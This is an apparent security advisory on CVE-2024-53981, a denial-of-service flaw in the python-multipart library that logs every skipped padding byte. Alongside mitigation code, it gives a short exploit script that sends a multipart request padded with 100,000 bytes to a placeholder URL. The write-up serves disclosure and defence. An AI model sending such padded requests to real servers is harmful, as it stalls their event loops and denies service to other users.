A vulnerability in the python-multipart library, tracked as CVE-2024-53981, can lead to denial of service (DoS) in ASGI (Asynchronous Server Gateway Interface) applications that run an unpatched version. The issue is fixed in python-multipart 0.0.18. This post covers the details of the vulnerability: an overview of python-multipart, how the flaw can be triggered, and how to mitigate the risk.

Overview of Python-multipart

Python-multipart is a streaming multipart parser for Python, commonly used to parse form data in web applications. It handles large file uploads by parsing the stream incrementally, without loading the entire body into memory. More information about python-multipart can be found in its official repository on GitHub (https://github.com/andrew-d/python-multipart).

Vulnerability Details

When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any trailing bytes after the last boundary. It does this one byte at a time and emits a log event for every byte it skips. For inputs with a long run of such bytes, this produces excessive logging, and the cost of formatting and writing each record is paid for every byte of padding.
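To make the mechanism concrete, the following is an added example and not python-multipart's own code: it models, in simplified form, the per-byte skip that logs every step (the leading CR/LF case described above) next to a bulk skip that measures the run once and logs once. A counting log handler shows how many records each variant emits for the same body. The boundary string, the logger names and the constructed body are assumptions.

```python
import logging


class CountingHandler(logging.Handler):
    """Counts emitted log records so the two variants can be compared."""

    def __init__(self) -> None:
        super().__init__()
        self.count = 0

    def emit(self, record: logging.LogRecord) -> None:
        self.count += 1


def make_counting_logger(name: str) -> tuple:
    """Return a DEBUG-level logger wired only to a fresh CountingHandler."""
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    handler = CountingHandler()
    logger.addHandler(handler)
    return logger, handler


def skip_leading_crlf_per_byte(data: bytes, logger: logging.Logger) -> int:
    """Model of the pre-0.0.18 behaviour described above: advance one byte at a
    time over leading CR/LF and emit a log record for every byte skipped.
    Returns the offset of the first non-CR/LF byte."""
    i = 0
    while i < len(data) and data[i] in (0x0D, 0x0A):  # CR or LF
        logger.debug("Skipping leading CR/LF at %d", i)
        i += 1
    return i


def skip_leading_crlf_bulk(data: bytes, logger: logging.Logger) -> int:
    """Hardened variant: measure the CR/LF run first, then log once."""
    i = 0
    while i < len(data) and data[i] in (0x0D, 0x0A):
        i += 1
    if i:
        logger.debug("Skipped %d leading CR/LF bytes", i)
    return i


def count_log_events(prefix_len: int, per_byte: bool) -> tuple:
    """Build a constructed body of prefix_len newlines followed by a delimiter
    line and return (offset_found, log_records_emitted) for the chosen variant."""
    body = b"\n" * prefix_len + b"-----1234---\r\n"  # delimiter = "--" + assumed boundary
    name = "demo.per_byte" if per_byte else "demo.bulk"
    logger, handler = make_counting_logger(name)
    skip = skip_leading_crlf_per_byte if per_byte else skip_leading_crlf_bulk
    offset = skip(body, logger)
    return offset, handler.count


if __name__ == "__main__":
    for n in (10, 100_000):
        print(n, "per-byte:", count_log_events(n, True), "bulk:", count_log_events(n, False))
```

Both variants find the delimiter at the same offset; the difference is that the per-byte loop emits one record per padding byte, so a 100,000-byte prefix means 100,000 formatted log records before any real parsing starts. The real parser is a state machine over the whole body, and the trailing-bytes case after the final boundary follows the same per-byte pattern; this model covers only the leading CR/LF path.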

Attack Vector

An attacker can exploit this by sending a request whose multipart body carries a long run of line breaks before the first boundary, or a large amount of arbitrary data after the last boundary. Because the parser walks that padding one byte at a time and logs each step, the request causes high CPU load and stalls the processing thread for an extended period. In an ASGI application the parser runs on the event loop, so the stall blocks every other request being served by that worker, resulting in a denial of service (DoS).

Exploit Code Snippet

import requests

# Target endpoint that parses multipart/form-data with python-multipart (placeholder URL)
url = "http://example.com/upload"

# Padding the vulnerable parser consumes one byte at a time, logging each byte.
# Here it is appended after the final boundary (trailing bytes); a long run of
# CR/LF bytes before the first boundary triggers the same per-byte loop.
padding = b'a' * 100000

boundary = "---1234---"
headers = {
    "Content-Type": "multipart/form-data; boundary=" + boundary
}

# Each delimiter line is "--" + boundary; the closing delimiter adds a trailing "--".
delimiter = ("--" + boundary).encode()
payload = (
    delimiter + b'\r\nContent-Disposition: form-data; name="file"; filename="test.txt"\r\n\r\nHello, World!\r\n'
    + delimiter + b'--\r\n'
    + padding
)

response = requests.post(url, headers=headers, data=payload)

print(response.status_code, response.text)

Mitigation

To mitigate this issue, update python-multipart to version 0.0.18 or later. With pip, the Python package manager, run:

pip install --upgrade "python-multipart>=0.0.18"
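Upgrading is the fix. As an added example that is not from the python-multipart project, the following shows two checks a practitioner can layer on top: a version comparison against 0.0.18 that can be run against the installed package, and a pure-ASGI middleware that refuses multipart/form-data requests whose declared Content-Length is missing or above a cap, before the body ever reaches the parser. The wrapped app, the limit, the route and the refuse-on-missing-length policy are assumptions.

```python
import asyncio
import re
from importlib import metadata
from typing import Optional

FIXED_VERSION = (0, 0, 18)  # first python-multipart release with the fix


def parse_version(version: str) -> tuple:
    """Parse a plain X.Y.Z version string (pre-release suffixes are ignored; assumption)."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.groups())


def is_vulnerable_version(version: str) -> bool:
    """True if this python-multipart version predates the 0.0.18 fix."""
    return parse_version(version) < FIXED_VERSION


def installed_python_multipart_is_vulnerable() -> Optional[bool]:
    """Check the installed package; None when python-multipart is not installed."""
    try:
        return is_vulnerable_version(metadata.version("python-multipart"))
    except metadata.PackageNotFoundError:
        return None


class MultipartSizeLimitMiddleware:
    """Hypothetical pure-ASGI middleware (not part of any framework) that refuses
    multipart/form-data requests with no Content-Length, or whose declared length
    exceeds max_bytes, before the body reaches the multipart parser.
    Defence in depth only: a request under the cap can still carry as many
    padding bytes as the cap allows, so it narrows the attack, not removes it."""

    def __init__(self, app, max_bytes: int) -> None:
        self.app = app
        self.max_bytes = max_bytes

    async def __call__(self, scope, receive, send) -> None:
        if scope["type"] == "http" and self._too_large(scope):
            await send({
                "type": "http.response.start",
                "status": 413,
                "headers": [(b"content-type", b"text/plain")],
            })
            await send({"type": "http.response.body", "body": b"payload too large"})
            return
        await self.app(scope, receive, send)

    def _too_large(self, scope) -> bool:
        headers = {name.lower(): value for name, value in scope.get("headers", [])}
        content_type = headers.get(b"content-type", b"").lower()
        if not content_type.startswith(b"multipart/form-data"):
            return False  # the cap applies only to multipart bodies
        length = headers.get(b"content-length")
        if length is None:
            return True  # chunked multipart uploads are refused (policy assumption)
        try:
            return int(length) > self.max_bytes
        except ValueError:
            return True  # a malformed Content-Length is refused as well


async def echo_app(scope, receive, send) -> None:
    """Stand-in for the protected application."""
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})


def simulate_request(app, content_type: bytes, content_length: Optional[int]) -> int:
    """Drive an ASGI app with a constructed POST scope and return the status code."""
    headers = [(b"content-type", content_type)]
    if content_length is not None:
        headers.append((b"content-length", str(content_length).encode()))
    scope = {"type": "http", "method": "POST", "path": "/upload", "headers": headers}
    sent = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    asyncio.run(app(scope, receive, send))
    return sent[0]["status"]


if __name__ == "__main__":
    guarded = MultipartSizeLimitMiddleware(echo_app, max_bytes=1_000_000)
    print(simulate_request(guarded, b"multipart/form-data; boundary=---1234---", 2_000_000))  # 413
    print(simulate_request(guarded, b"multipart/form-data; boundary=---1234---", 1_000))      # 200
    print("installed python-multipart vulnerable:", installed_python_multipart_is_vulnerable())
```

The size cap is cheap because it only reads headers, but it is no substitute for the upgrade: the per-byte loop is linear in the padding, so a 1 MB cap still permits roughly a million log records per request. Treat the middleware as a way to shrink the window while the dependency bump rolls out, and pin the version in your lock file so the check above stays green.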

Conclusion

In summary, CVE-2024-53981 poses a significant risk to ASGI applications, since an attacker can use it to stall the event loop and deny service to other clients. To mitigate the risk, make sure your application uses python-multipart version 0.0.18 or later.

Timeline

Published on: 12/02/2024 16:15:14 UTC